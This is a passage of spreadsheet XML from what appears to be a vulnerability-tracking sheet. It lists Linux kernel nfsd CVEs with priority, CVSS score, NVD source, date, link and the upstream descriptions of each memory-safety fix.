reaps the entry.</t>
        </is>
      </c>
      <c r="S91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89669</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89674</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr"/>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix XDR length calculation in nfsd4_ff_encode_layoutget
The XDR buffer size calculation in nfsd4_ff_encode_layoutget() has
multiple errors that can result in either an out-of-bounds write or
leaking uninitialized kernel memory to the client:
 - fh_len doesn't account for XDR padding on the file handle data
 - uid and gid lengths use "8 + len" but xdr_encode_opaque() actually
   writes "4 + xdr_align_size(len)" bytes
 - ds_len omits the flags and stats_collect_hint fields (8 bytes),
   while len's header constant overestimates by 8 bytes -- these
   partially cancel but leave a net mismatch
The worst case occurs with short strings (e.g. uid=0, gid=0 with an
odd-sized file handle), where the function writes up to 5 bytes past
the reserved XDR buffer. Conversely, when string lengths happen to be
4-byte aligned, the reservation is too large and stale buffer content
is sent to the client.
Fix this by breaking out every encoded field explicitly in the ds_len
calculation, using xdr_align_size() for all variable-length opaque
fields, and correcting the header constants.</t>
        </is>
      </c>
      <c r="S92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89674</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89675</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr"/>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix UAF in async copy cancel and shutdown
An async copy could be freed or used after free while a teardown caller
(OFFLOAD_CANCEL, nfsd4_shutdown_copy, nfsd4_cancel_copy_by_sb) raced the
copy kthread:
  - find_async_copy() bumped copy-&gt;refcount but left the copy on
    clp-&gt;async_copies, so the reaper's cleanup_async_copy() could run
    release_copy_files() concurrently with a cancel/shutdown caller. Both
    put and NULL nf_src/nf_dst without a common lock, double-putting the
    nfsd_file and freeing it early.
  - nfsd4_do_async_copy() set NFSD4_COPY_F_STOPPED before its final uses
    of the copy (nfsd_update_cmtime_attr() on copy-&gt;nf_dst,
    nfsd4_send_cb_offload()). nfsd4_stop_copy() treats a set STOPPED bit
    as "kthread done, skip kthread_stop()", so a teardown caller ran
    release_copy_files() -- which puts and NULLs nf_dst -- while the
    kthread still dereferenced it (NULL/UAF).
  - copy-&gt;copy_task was never pinned. The one-shot kthread self-reaps on
    return, so kthread_stop()'s get_task_struct() could touch a freed
    task_struct.
  - co_cb is embedded in the copy, but nfsd4_send_cb_offload() held a
    reference only on the client, so a concurrent teardown could free
    the copy while the CB_OFFLOAD callback was in flight.
Fix the teardown lifetime as a whole:
  - find_async_copy() unlinks the copy (clear cp_clp, list_del_init)
    under async_lock; the cancel, shutdown, and sb-cancel paths drop the
    list-membership reference via nfs4_put_copy() after nfsd4_stop_copy().
    Drop the now-redundant list_del fixup from cleanup_async_copy().
  - Because unlinking hides the copy from the reaper, its
    cleanup_async_copy() can no longer remove the copy's s2s_cp_stateids
    entry; the cancel/shutdown/sb-cancel paths now call
    nfs4_free_copy_state() themselves (while cp_clp is still valid) so
    the entry does not dangle at freed memory for the laundromat and
    manage_cpntf_state() to dereference.
  - Give the kthread its own reference, taken in nfsd4_copy() before
    wake_up_process() and dropped at the end of nfsd4_do_async_copy();
    call wake_up_process() before list_add().
  - Pin the task_struct with get_task_struct() in nfsd4_copy(), released
    in nfs4_put_copy(), so kthread_stop() is safe whenever the kthread
    exits. Set NFSD4_COPY_F_STOPPED only in nfsd4_stop_copy(), which now
    always kthread_stop()s before release_copy_files(); completion is
    still reported via NFSD4_COPY_F_COMPLETED, so
    nfsd4_has_active_async_copies() is unaffected. Each teardown caller
    removes the copy from clp-&gt;async_copies first, so kthread_stop() runs
    exactly once.
  - Take a copy reference in nfsd4_send_cb_offload(), dropped in
    nfsd4_cb_offload_release(). The kthread still holds its own reference
    there, so the refcount_inc() cannot race the final free.
  - Read cp_clp with smp_load_acquire() to pair with the unordered
    set_bit()/clear_bit() writers (Documentation/atomic_bitops.rst).</t>
        </is>
      </c>
      <c r="S93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89675</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89676</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr"/>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix stale s2s_cp_stateids IDR entry for async COPY
For an async COPY, nfsd4_copy() called nfs4_init_copy_state() before
dup_copy_fields(), so the s2s_cp_stateids IDR was pointed at
&amp;u-&gt;copy-&gt;cp_stateid -- memory in the per-rqstp COMPOUND buffer that is
reused by the next request. dup_copy_fields() copies only the value into
async_copy, so the IDR slot dangled at the transient buffer for the whole
background copy. Any IDR walker then dereferences reused request memory:
the laundromat reads cs_type from it and, if the bytes look like an
expired NFS4_COPYNOTIFY_STID, follows into
refcount_dec()/idr_remove()/kfree() on garbage; manage_cpntf_state() has
the same exposure via idr_find().
Duplicate the fields first, then register the stateid on the stable
async_copy. result-&gt;cb_stateid is unchanged.</t>
        </is>
      </c>
      <c r="S94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89676</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89677</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr"/>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix possible fh_compose of wrong dentry in nfsd4_create_file()
dentry_create() can hypothetically provide a different dentry than the
one passed in.  This could happen, for example, if the exported
filesystem is NFS, and the server returned to OPEN a filehandle which
matched a directory that was already in the dcache.  Clearly this would
not be expected!
If this were to happen the dentry (child) that was already stored in
resfhp could be freed and later dereferenced.
We shouldn't call fh_compose() until we are certain that we have the
final dentry, so this patch moved the fh_compose() call to two places:
one for the case where the target already exists, and one after
dentry_create() where it was created.</t>
        </is>
      </c>
      <c r="S95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89677</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89681</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr"/>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix layout fence worker double-reference race
The workqueue core clears WORK_STRUCT_PENDING before the callback
is invoked, so delayed_work_pending() in lm_breaker_timedout() can
return false while the fence worker is already running. This lets
the breaker take a duplicate sc_count reference and schedule a new
worker that coalesces with the in-progress one. The extra reference
is never put, leaking the layout stateid.
Replace the racy delayed_work_pending() check with an
ls_fence_inflight boolean set atomically with
refcount_inc_not_zero() under ls_lock, and cleared under ls_lock
before the final nfs4_put_stid() on the dispose path; the retry
path intentionally retains it.  Remove the self-rearm
mod_delayed_work() at the top of the worker.</t>
        </is>
      </c>
      <c r="S96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89681</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89686</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr"/>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix BUG_ON in nfsd4_alloc_layout_stateid on racing delegation revoke
nfsd4_alloc_layout_stateid reads fp-&gt;fi_deleg_file without holding
fi_lock when the parent stateid is a delegation. A concurrent delegation
revoke via the laundromat can clear fi_deleg_file under fi_lock, causing
nfsd_file_get() to return NULL and triggering the BUG_ON.
This race is client-reachable: two NFS clients can trigger it by having
one hold a delegation while another opens the same file to force a
recall. When the first client doesn't respond to the recall, the
laundromat revokes it. A concurrent LAYOUTGET from any client using the
delegation stateid hits the race window.
Fix this by taking fi_lock around the fi_deleg_file read in the
SC_TYPE_DELEG path, matching the locking discipline of the
find_any_file() arm, and replacing the BUG_ON with a graceful error
return that cleans up the partially-initialized layout stateid.</t>
        </is>
      </c>
      <c r="S97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89686</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89688</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr"/>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: drop the stateid, not the stateowner, on seqid_op replay retry
In nfs4_preprocess_seqid_op() the stateid is obtained from
nfsd4_lookup_stateid(), which holds a reference on the nfs4_stid
(sc_count) but takes no reference on the stateowner. openlockstateid()
merely casts that stid and likewise takes no reference.
When nfsd4_cstate_assign_replay() returns -EAGAIN (the replay owner is
being torn down, RP_UNHASHED) it has not taken a stateowner reference on
that path. The error handling nevertheless called
nfs4_put_stateowner(stp-&gt;st_stateowner), dropping an so_count reference
the function never acquired -- risking a stateowner refcount underflow and
use-after-free -- while leaking the sc_count reference held on the stid.
The leaked stid reference can also stall a concurrent
nfsd4_close_open_stateid() waiting for sc_count to drop.
Drop the reference actually held -- the stid -- before retrying. The
stateowner stays alive through the reference held by the stid. This mirrors
the open path in nfsd4_process_open1(), where the put balances a reference
that path explicitly holds on the stateowner.</t>
        </is>
      </c>
      <c r="S98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89688</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89689</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr"/>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: don't free session slots that are still in use
nfsd4_sequence() can free the very slot it is currently processing.
When the session shrinker has reduced se_target_maxslots below
se_fchannel.maxreqs, the shrink path checks three conditions before
calling free_session_slots():
  1. se_target_maxslots &lt; maxreqs  (shrink was advertised)
  2. slot-&gt;sl_generation == se_slot_gen  (slot is up-to-date)
  3. seq-&gt;maxslots &lt;= se_target_maxslots  (client acknowledges)
However, seq-&gt;slotid is never checked against se_target_maxslots.
A client using a slot in the range [se_target_maxslots, maxreqs) can
satisfy all three conditions: its slot has the current generation
(set by a prior SEQUENCE), and it sends sa_highest_slotid &lt;=
se_target_maxslots to acknowledge the reduction.
free_session_slots() then kfrees every slot at index &gt;=
se_target_maxslots, including the caller's own slot. The function
continues to write sl_seqid, sl_flags, sl_generation, and stores the
dangling pointer in cstate-&gt;slot. Later, nfsd4_store_cache_entry()
copies up to maxresp_cached bytes of the compound reply into the freed
sl_data[] array, corrupting whatever slab object now occupies that
address.
Additionally, a concurrent thread processing SEQUENCE on a different
high-numbered slot can have its slot freed out from under it.
NFSD4_SLOT_INUSE is set under nn-&gt;client_lock before the lock is
released, so any concurrent thread past SEQUENCE will have its slot
marked. However, free_session_slots() does not check NFSD4_SLOT_INUSE
before freeing.
Fix both problems by:
 1. Checking that the current request's slotid is below the shrink
    boundary.
 2. Scanning slots in the to-be-freed range for NFSD4_SLOT_INUSE and
    deferring the shrink if any are active.</t>
        </is>
      </c>
      <c r="S99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89689</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89702</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr"/>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: size fh_verify server sockaddr slot by xpt_locallen
The nfsd_fh_verify and nfsd_fh_verify_err tracepoints declare the
server sockaddr slot sized by xpt_remotelen but fill it from
xpt_local using xpt_locallen:
    TP_STRUCT__entry(
            ...
            __sockaddr(server, rqstp-&gt;rq_xprt-&gt;xpt_remotelen)
            ...
    )
    TP_fast_assign(
            ...
            __assign_sockaddr(server, &amp;rqstp-&gt;rq_xprt-&gt;xpt_local,
                              rqstp-&gt;rq_xprt-&gt;xpt_locallen);
            ...
    )
When xpt_locallen exceeds xpt_remotelen, __assign_sockaddr's memcpy
writes past the reserved ring-buffer slot. In the reverse direction
(xpt_locallen &lt; xpt_remotelen) the slot is oversized and the
unwritten tail leaks prior ring-buffer contents to trace consumers.
The write-past-end case is reachable on NFS/UDP. svc_xprt_set_remote()
is only called from svc_tcp_accept() (net/sunrpc/svcsock.c) and from
the RDMA connect path; svc_create_socket() for UDP calls only
svc_xprt_set_local(), so xpt_remotelen stays 0 for the xprt's
lifetime. Every fh_verify trace for an NFSv2/v3-over-UDP request
then copies 16 or 28 bytes from xpt_local into a zero-byte slot.
The other NFSD tracepoints that record the server address
(NFSD_TRACE_PROC_CALL_FIELDS, NFSD_TRACE_PROC_RES_FIELDS,
SVC_RQST_ENDPOINT_FIELDS) already size the server slot by
xpt_locallen; nfsd_fh_verify and nfsd_fh_verify_err were the only
exceptions.
Fix by sizing the server slot with xpt_locallen so the declared slot
matches the copy length. The client slot and its assignment already
agree on xpt_remotelen and are left untouched.</t>
        </is>
      </c>
      <c r="S100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89702</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89703</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr"/>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: set SC_STATUS_FREED in nfsd4_drop_revoked_stid for delegations
nfsd4_drop_revoked_stid() handles FREE_STATEID for admin-revoked
delegations but does not set SC_STATUS_FREED before releasing cl_lock.
revoke_delegation() uses this flag to detect whether FREE_STATEID has
already processed the delegation -- without it, the freed delegation is
added to cl_revoked via list_add(), producing a use-after-free when
cl_revoked is later traversed in __destroy_client().
The SC_STATUS_REVOKED path in nfsd4_free_stateid() (line 7983) already
sets SC_STATUS_FREED correctly. Apply the same pattern to the
SC_STATUS_ADMIN_REVOKED path in nfsd4_drop_revoked_stid().</t>
        </is>
      </c>
      <c r="S101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89703</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89708</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr"/>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: RCU-protect cl_cb_session to fix use-after-free on session teardown
After a DESTROY_SESSION the per-session teardown path can free a
session while rpciod still holds an inflight callback rpc_task that
dereferences clp-&gt;cl_cb_session.  nfsd4_probe_callback_sync() flushes
cl_callback_wq, but once nfsd4_run_cb_work() has called
rpc_call_async() the rpc_task lives on rpciod; flushing the workqueue
does not wait for it.  rpc_shutdown_client() does drain rpciod tasks,
but uses a 1-second wait_event_timeout — tasks stuck in rpc_delay()
(e.g. 2-second NFS4ERR_DELAY retries) can outlive the drain.
    destroy path                       rpciod
    ------------                       ------
    unhash_session(ses)
    nfsd4_probe_callback_sync(clp)
      flush_workqueue(cl_callback_wq)
      /* returns; rpc_task still live */
    nfsd4_put_session_locked(ses)
    free_session(ses) -&gt; kfree(ses)
                                       nfsd4_cb_sequence_done()
                                         reads cb_clp-&gt;cl_cb_session
                                         /* freed slab */
A second window exists in nfsd4_process_cb_update().  When
__nfsd4_find_backchannel() returns NULL because unhash_session() has
already removed the destroyed session from cl_sessions,
setup_callback_client() takes the v4.1 early return so
clp-&gt;cl_cb_session = ses never fires and the field retains a pointer
to the about-to-be-freed session.
Fix both by converting cl_cb_session to an RCU-protected pointer:
  - Move the cl_cb_session = ses assignment in setup_callback_client()
    to after rpc_create() succeeds, so it is only published when a
    working backchannel exists.  Clear cl_cb_session on the error
    return in nfsd4_process_cb_update().  Both stores use
    rcu_assign_pointer().
  - Annotate cl_cb_session with __rcu.  All rpciod-side readers use
    rcu_read_lock()/rcu_dereference() and check for NULL, bailing to
    the appropriate error or requeue path:
    encode_cb_sequence4args(), decode_cb_sequence4resok(),
    nfsd41_cb_get_slot(), nfsd41_cb_release_slot(),
    nfsd4_cb_prepare(), and nfsd4_cb_sequence_done().
  - Switch __free_session() from kfree() to kfree_rcu() so the
    session slab is not reclaimed until after an RCU grace period,
    guaranteeing that rpciod readers inside rcu_read_lock() never
    dereference freed memory.
  - Pass the session pointer to the nfsd_cb_seq_status and
    nfsd_cb_free_slot tracepoints instead of having them re-read
    cl_cb_session.
  - nfsd4_cb_prepare() calls rpc_exit() when the session is NULL,
    routing through the done/release path to requeue the callback.</t>
        </is>
      </c>
      <c r="S102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89708</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89712</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
